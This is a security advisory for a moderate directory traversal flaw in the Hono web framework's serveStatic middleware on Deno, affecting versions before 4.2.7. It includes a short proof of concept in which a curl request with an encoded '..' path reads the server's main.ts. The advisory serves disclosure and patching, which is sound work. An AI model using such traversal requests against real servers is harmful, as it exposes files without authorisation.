[NPM:GHSA-3MPF-RCC7-5347] Hono vulnerable to Restricted Directory Traversal in serveStatic with deno
Severity
Moderate
Affected Packages
1
Fixed Packages
1
CVEs
1
Summary
When using serveStatic with deno, it is possible to directory traverse where main.ts is located.
My environment is configured as per this tutorial
https://hono.dev/getting-started/deno
PoC
bash
$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
└── a.txt
source
```jsx
import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'
const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))
Deno.serve(app.fetch)
```
request
bash
curl localhost:8000/static/%2e%2e/main.ts
response is content of main.ts
Impact
Unexpected files are retrieved.
Affected
Package | Affected Version |
---|---|
pkg:npm/hono | < 4.2.7 |
Fixed
Package | Fixed Version |
---|---|
pkg:npm/hono | = 4.2.7 |
- ID
- NPM:GHSA-3MPF-RCC7-5347
- Severity
- moderate
- URL
- https://github.com/advisories/GHSA-3mpf-rcc7-5347
- Published
-
2024-04-23T16:20:49
(9 months ago) - Modified
-
2024-04-24T14:26:48
(9 months ago) - Rights
- NPM Security Team
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | Exploits | PoC | Pubblication Date | Modification Date |
---|---|---|---|---|---|---|---|---|---|---|---|
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | PoC | Pubblication Date | Modification Date |